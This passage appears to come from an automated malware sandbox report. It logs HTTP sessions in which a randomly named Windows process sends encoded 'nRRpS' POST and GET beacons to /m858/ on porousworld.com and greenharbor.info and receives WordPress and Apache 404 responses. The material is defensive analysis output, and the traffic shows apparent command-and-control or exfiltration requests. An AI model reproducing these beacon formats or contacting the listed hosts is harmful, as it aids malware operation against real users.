                                                                                                                      Data Ascii: de]:where([style*=vertical-lr]),h6.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]){rotate:180deg}</style><style id='wp-block-paragraph-inline-css'>.is-small-text{font-size:.875em}.is-regular-text{font-size:1em}.is-larg


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      7192.168.2.849715173.231.241.132806992C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 13:43:04.952063084 CET1748OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.porousworld.com
                                                                                                                      Origin: http://www.porousworld.com
                                                                                                                      Referer: http://www.porousworld.com/m858/
                                                                                                                      Content-Length: 1218
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 6e 52 52 70 53 3d 38 51 72 38 46 50 2f 39 53 56 6d 44 42 4c 51 45 37 51 74 37 6f 34 56 4f 53 2b 5a 2b 62 76 4b 2b 33 7a 6a 4b 30 46 77 30 62 66 71 78 49 54 69 6d 75 52 75 49 38 39 46 43 79 4e 6e 52 4c 4e 55 55 73 30 6b 56 76 4e 33 34 74 73 62 6b 71 46 50 42 78 33 37 74 41 6c 7a 36 44 50 67 57 4e 4c 72 39 5a 44 46 36 6b 4c 65 36 74 39 37 31 45 42 4b 47 4f 63 78 47 76 2f 4d 79 51 30 77 5a 36 46 4e 4b 6a 66 7a 77 65 6a 77 50 59 64 6e 4a 32 43 6e 6d 52 48 4e 32 44 4a 72 41 62 62 47 30 56 33 75 66 75 33 42 4b 41 53 2f 5a 6e 43 4d 51 57 32 2b 64 45 37 6b 38 41 72 66 32 6a 33 51 51 4a 70 70 65 52 5a 49 55 72 37 69 63 4e 48 48 6a 4f 44 37 75 65 6f 4b 68 74 38 69 37 6c 4d 56 5a 69 79 51 49 57 4f 32 72 50 43 73 46 69 30 50 71 42 51 65 34 52 74 69 51 36 6f 75 46 2f 53 39 2b 45 73 63 67 6b 37 51 65 5a 78 6f 4c 4b 4e 33 36 38 47 33 6d 77 42 4e 4e 30 58 55 32 6d 39 4e 65 53 68 69 73 31 37 6d 49 76 74 54 44 74 65 44 53 61 53 6f 61 6d 42 46 2b 53 44 6d 6e 56 70 63 6b 42 52 35 68 6e 4a 4e 45 32 51 4a 59 33 6c 76 2b 2f 78 6b 30 47 37 39 63 58 2b 57 58 4c 64 62 57 69 64 54 65 76 68 78 7a 4b 6f 58 4f 67 73 56 30 53 62 74 58 30 66 78 78 46 68 58 32 61 7a 6c 50 58 47 70 34 37 36 35 4e 43 34 58 38 74 62 31 41 61 38 44 38 33 66 76 4d 49 30 4d 77 53 68 63 74 67 4b 79 47 34 32 67 42 6c 59 54 70 57 38 37 6f 32 55 38 4f 42 74 57 56 78 58 4d 4c 4f 50 7a 63 78 35 31 36 36 75 65 34 2b 4c 2b 71 4c 33 69 63 7a 36 38 63 36 33 54 65 75 7a 69 55 33 4a 75 50 7a 41 33 47 33 75 31 4f 66 76 4a 4c 6e 39 6b 72 71 4f 37 43 41 39 42 79 77 6d 36 41 63 4e 4a 6e 6c 36 55 59 4b 39 37 47 32 50 71 70 43 4d 34 74 52 67 4e 51 66 55 43 4f 32 66 33 51 2b 6c 53 79 68 71 5a 45 75 4a 71 63 33 33 4e 54 57 69 2b 4d 55 47 52 34 51 31 2f 35 30 58 6c 2f 52 59 76 75 4c 7a 53 75 33 61 44 73 46 68 64 59 41 36 47 79 48 78 66 4d 42 7a 2f 32 4d 6d 5a 57 66 7a 34 76 6d 34 56 4e 4c 51 53 78 2f 69 53 6a 51 72 43 4b 43 32 63 50 46 2b 75 55 69 69 63 59 33 2f 78 46 61 38 34 6b 59 45 36 49 62 67 71 65 33 30 64 6a 39 72 43 42 31 6d 67 54 4d 72 57 75 59 6b 77 6b 54 7a 36 72 77 69 6d 66 73 53 57 5a 63 75 6d 48 37 57 54 66 4e 55 67 5a 30 50 59 59 65 2f 76 69 5a 4d 6e 34 6b 4e 35 47 56 39 79 46 4f 43 33 75 55 48 55 44 39 6d 49 32 6b 69 4c 36 44 42 5a 52 4d 6d 34 4d 38 76 63 65 53 74 4f 36 72 36 4e 30 62 33 65 68 45 6e 4a 55 51 56 63 79 33 6d 69 6e 43 34 47 4e 61 44 67 53 61 4c 6a 62 31 66 6e 41 50 5a 41 47 32 61 50 4e 71 75 70 30 41 36 53 61 4d 4f 71 34 6b 6f 48 67 70 62 6c 53 51 2b 75 6c 47 57 39 71 77 2b 75 6a 43 36 2f 62 39 64 75 78 31 63 38 72 67 46 66 49 2f 6c 74 48 43 33 46 31 63 43 48 77 6f 59 47 5a 5a 35 36 70 4e 74 77 6b 57 46 54 7a 2b 75 57 58 4a 56 38 6f 55 4f 34 2b 47 55 6f 65 45 43 6b 44 2b 30 35 6b 79 65 4d 41 79 37 33 42 70 4e 55 7a 30 30 38 73 66 54 49 61 48 65 49 4e 54 57 78 4f 62 79 2b 33 64 73 42 6f 41 59 2f 41 78 33 66 75 55 54 75 6f 65 57 32 74 35 7a 49 6e 76 37 68 66 66 35 44 62 43 57 2b 71 5a 4d 64 76 37 51 30 52 71 49 46 48 52 4e 6d 32 63 64 6a 71 4e 6d 5a 7a 41 36 65 4d 76 67 7a 38 6d 70 6e 7a 46 78 32 6c 74 44 78 5a 2b 5a 70 36 73 6e 44 58 73 2f 6a 52 4a 73 37 46 45 2b 41 79 37 33 79 38 38 58 4e 2f 37 66 52 41 39 6c 34 45 45 64 42 2f 56 54 5a 51 42 67 35 65 43 61 73 71 77 5a 6c 39 72 6b 4f 37 55 56 78 32 43 47 4e 67 6d 6b 35 4f 70 76 4b 52 56 35 68 78 48 65 37 6c 79 37 44 51 6c 4f 49 34 70 4e 77 64 76 2f 45 58 39 64 58 48 55 71 71 34 51 46 44 33 34 45 33 72 51 44 42 6c 75 76 37 32 46 68 50 38 53 68 6a 6c 2b 57 4e 39 30 49 2b 30 70 61 74 67 41 6a 69 6b 41 4e 52 4c 4b 6b 57 6c 30 51 46 50 42 6b 51 6a 71 42 51 5a 72 50 35 47 2b 64 4e 43 72 68 4b 37 33 45 73 77 30 64 6d 48 48 62 69 6b 6a 6a 30 4e 48 30 51 65 55 71 76 57 34 52 2f 2f 38 62 66 4e
                                                                                                                      Data Ascii: nRRpS=8Qr8FP/9SVmDBLQE7Qt7o4VOS+Z+bvK+3zjK0Fw0bfqxITimuRuI89FCyNnRLNUUs0kVvN34tsbkqFPBx37tAlz6DPgWNLr9ZDF6kLe6t971EBKGOcxGv/MyQ0wZ6FNKjfzwejwPYdnJ2CnmRHN2DJrAbbG0V3ufu3BKAS/ZnCMQW2+dE7k8Arf2j3QQJppeRZIUr7icNHHjOD7ueoKht8i7lMVZiyQIWO2rPCsFi0PqBQe4RtiQ6ouF/S9+Escgk7QeZxoLKN368G3mwBNN0XU2m9NeShis17mIvtTDteDSaSoamBF+SDmnVpckBR5hnJNE2QJY3lv+/xk0G79cX+WXLdbWidTevhxzKoXOgsV0SbtX0fxxFhX2azlPXGp4765NC4X8tb1Aa8D83fvMI0MwShctgKyG42gBlYTpW87o2U8OBtWVxXMLOPzcx5166ue4+L+qL3icz68c63TeuziU3JuPzA3G3u1OfvJLn9krqO7CA9Bywm6AcNJnl6UYK97G2PqpCM4tRgNQfUCO2f3Q+lSyhqZEuJqc33NTWi+MUGR4Q1/50Xl/RYvuLzSu3aDsFhdYA6GyHxfMBz/2MmZWfz4vm4VNLQSx/iSjQrCKC2cPF+uUiicY3/xFa84kYE6Ibgqe30dj9rCB1mgTMrWuYkwkTz6rwimfsSWZcumH7WTfNUgZ0PYYe/viZMn4kN5GV9yFOC3uUHUD9mI2kiL6DBZRMm4M8vceStO6r6N0b3ehEnJUQVcy3minC4GNaDgSaLjb1fnAPZAG2aPNqup0A6SaMOq4koHgpblSQ+ulGW9qw+ujC6/b9dux1c8rgFfI/ltHC3F1cCHwoYGZZ56pNtwkWFTz+uWXJV8oUO4+GUoeECkD+05kyeMAy73BpNUz008sfTIaHeINTWxOby+3dsBoAY/Ax3fuUTuoeW2t5zInv7hff5DbCW+qZMdv7Q0RqIFHRNm2cdjqNmZzA6eMvgz8mpnzFx2ltDxZ+Zp6snDXs/jRJs7FE+Ay73y88XN/7fRA9l4EEdB/VTZQBg5eCasqwZl9rkO7UVx2CGNgmk5OpvKRV5hxHe7ly7DQlOI4pNwdv/EX9dXHUqq4QFD34E3rQDBluv72FhP8Shjl+WN90I+0patgAjikANRLKkWl0QFPBkQjqBQZrP5G+dNCrhK73Esw0dmHHbikjj0NH0QeUqvW4R//8bfN
                                                                                                                      Dec 7, 2023 13:43:06.392672062 CET418INHTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 12:43:05 GMT
                                                                                                                      Server: Apache
                                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                      Link: <https://porousworld.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a
                                                                                                                      Data Ascii: 3b<!DOCTYPE html><html lang="en-US"><head><meta charset="
                                                                                                                      Dec 7, 2023 13:43:06.392689943 CET88INData Raw: 35 32 0d 0a 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22
                                                                                                                      Data Ascii: 52UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                                                                                                      Dec 7, 2023 13:43:06.416621923 CET63INData Raw: 33 39 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 0d 0a
                                                                                                                      Data Ascii: 39<meta name='robots' content='max-image-preview:large' />
                                                                                                                      Dec 7, 2023 13:43:06.418684006 CET57INData Raw: 33 33 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 50 6f 72 6f 75 73 20 57 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 0d 0a
                                                                                                                      Data Ascii: 33<title>Page not found &#8211; Porous World</title>
                                                                                                                      Dec 7, 2023 13:43:06.418699980 CET59INData Raw: 33 35 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 70 6f 72 6f 75 73 77 6f 72 6c 64 2e 63 6f 6d 27 20 2f 3e 0a 0d 0a
                                                                                                                      Data Ascii: 35<link rel='dns-prefetch' href='//porousworld.com' />
                                                                                                                      Dec 7, 2023 13:43:06.418826103 CET129INData Raw: 37 62 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 50 6f 72 6f 75 73 20 57 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46
                                                                                                                      Data Ascii: 7b<link rel="alternate" type="application/rss+xml" title="Porous World &raquo; Feed" href="https://porousworld.com/feed/" />
                                                                                                                      Dec 7, 2023 13:43:06.418838978 CET147INData Raw: 38 64 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 50 6f 72 6f 75 73 20 57 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43
                                                                                                                      Data Ascii: 8d<link rel="alternate" type="application/rss+xml" title="Porous World &raquo; Comments Feed" href="https://porousworld.com/comments/feed/" />
                                                                                                                      Dec 7, 2023 13:43:06.418850899 CET1286INData Raw: 63 65 38 0d 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72
                                                                                                                      Data Ascii: ce8<script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/porous
                                                                                                                      Dec 7, 2023 13:43:06.418863058 CET1286INData Raw: 2c 22 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5c 75 64 66 66 66 22 2c 22 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66
                                                                                                                      Data Ascii: ,"\ud83e\udef1\ud83c\udffb\u200d\ud83e\udef2\ud83c\udfff","\ud83e\udef1\ud83c\udffb\u200b\ud83e\udef2\ud83c\udfff")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(3
                                                                                                                      Dec 7, 2023 13:43:06.418875933 CET739INData Raw: 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                      Data Ascii: reateObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&
                                                                                                                      Dec 7, 2023 13:43:06.545614004 CET1286INData Raw: 32 35 32 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 74 69 74 6c 65 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 74 69 74 6c 65 20 61 7b 63 6f 6c 6f 72 3a 69 6e 68 65
                                                                                                                      Data Ascii: 252<style id='wp-block-site-title-inline-css'>.wp-block-site-title a{color:inherit}.wp-block-site-title{font-size: var(--wp--preset--font-size--medium);font-weight: normal;line-height: 1.4;}.wp-block-site-title a:where(:not(.wp-element-bu


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      8192.168.2.849716173.231.241.132806992C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 13:43:07.624785900 CET445OUTGET /m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=xSDcG6j+Ey2rPqhzwDdzjJVnVNgkT4rk7B/VgGxpF9KJHhiy72u20ZI8z6z+NNUSjVU02PDtrOX7gmvolmuvKlLpV/QRDbvCOg== HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.porousworld.com
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 13:43:11.453655958 CET486INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Thu, 07 Dec 2023 12:43:07 GMT
                                                                                                                      Server: Apache
                                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                      X-Redirect-By: WordPress
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Location: http://porousworld.com/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=xSDcG6j+Ey2rPqhzwDdzjJVnVNgkT4rk7B/VgGxpF9KJHhiy72u20ZI8z6z+NNUSjVU02PDtrOX7gmvolmuvKlLpV/QRDbvCOg==
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Dec 7, 2023 13:43:11.494385004 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      9192.168.2.84971769.57.161.215806992C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 13:43:16.946492910 CET718OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.greenharbor.info
                                                                                                                      Origin: http://www.greenharbor.info
                                                                                                                      Referer: http://www.greenharbor.info/m858/
                                                                                                                      Content-Length: 186
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 6e 52 52 70 53 3d 6f 31 6e 42 54 38 51 35 44 75 76 62 59 77 6d 75 71 49 69 50 52 30 63 5a 4c 69 70 46 4d 77 6b 52 52 38 43 70 57 6a 6e 33 6a 66 79 67 39 44 43 50 63 46 2f 6d 7a 37 76 5a 36 62 33 2f 57 65 71 41 39 2f 78 4e 49 77 71 6d 4f 2b 69 52 55 39 5a 52 62 37 54 72 34 53 33 6f 55 6e 56 63 35 74 73 55 7a 6c 52 6b 68 65 42 33 55 69 62 34 7a 35 45 76 66 36 53 4f 63 75 33 54 50 62 2f 37 36 48 32 42 4d 48 36 71 61 67 55 58 69 68 2f 79 48 6f 79 63 35 72 65 6d 50 79 76 46 34 48 76 53 57 55 51 4d 77 4d 2b 64 75 64 78 44 6c 4a 65 73 79 46 4b 46 5a 51 3d 3d
                                                                                                                      Data Ascii: nRRpS=o1nBT8Q5DuvbYwmuqIiPR0cZLipFMwkRR8CpWjn3jfyg9DCPcF/mz7vZ6b3/WeqA9/xNIwqmO+iRU9ZRb7Tr4S3oUnVc5tsUzlRkheB3Uib4z5Evf6SOcu3TPb/76H2BMH6qagUXih/yHoyc5remPyvF4HvSWUQMwM+dudxDlJesyFKFZQ==
                                                                                                                      Dec 7, 2023 13:43:17.232382059 CET533INHTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 12:43:17 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 389
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      10192.168.2.84971869.57.161.215806992C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 13:43:19.670157909 CET738OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.greenharbor.info
                                                                                                                      Origin: http://www.greenharbor.info
                                                                                                                      Referer: http://www.greenharbor.info/m858/
                                                                                                                      Content-Length: 206
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 6e 52 52 70 53 3d 6f 31 6e 42 54 38 51 35 44 75 76 62 5a 51 32 75 70 76 4f 50 58 55 63 61 53 53 70 46 5a 67 6c 61 52 38 2b 70 57 69 54 6e 67 74 57 67 39 69 79 50 54 67 54 6d 77 37 76 5a 31 37 33 2b 49 75 71 4c 39 2f 4e 72 49 78 57 6d 4f 2b 32 52 55 38 70 52 62 4e 62 71 33 69 33 71 42 33 56 65 6d 39 73 55 7a 6c 52 6b 68 65 55 67 55 69 44 34 7a 49 55 76 66 65 47 4e 41 65 33 51 5a 72 2f 37 2b 48 32 46 4d 48 36 49 61 6b 55 39 69 6a 48 79 48 70 43 63 36 2b 71 35 42 43 76 44 32 6e 75 51 64 6d 31 38 38 36 71 6d 6f 4e 35 39 6c 63 7a 2f 33 51 6d 57 65 75 38 4f 45 31 48 33 4d 48 6d 50 64 55 42 33 45 78 62 30 62 68 41 3d
                                                                                                                      Data Ascii: nRRpS=o1nBT8Q5DuvbZQ2upvOPXUcaSSpFZglaR8+pWiTngtWg9iyPTgTmw7vZ173+IuqL9/NrIxWmO+2RU8pRbNbq3i3qB3Vem9sUzlRkheUgUiD4zIUvfeGNAe3QZr/7+H2FMH6IakU9ijHyHpCc6+q5BCvD2nuQdm1886qmoN59lcz/3QmWeu8OE1H3MHmPdUB3Exb0bhA=
                                                                                                                      Dec 7, 2023 13:43:19.962165117 CET533INHTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 12:43:19 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 389
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      11192.168.2.84971969.57.161.215806992C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 13:43:22.388601065 CET1751OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.greenharbor.info
                                                                                                                      Origin: http://www.greenharbor.info
                                                                                                                      Referer: http://www.greenharbor.info/m858/
                                                                                                                      Content-Length: 1218
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
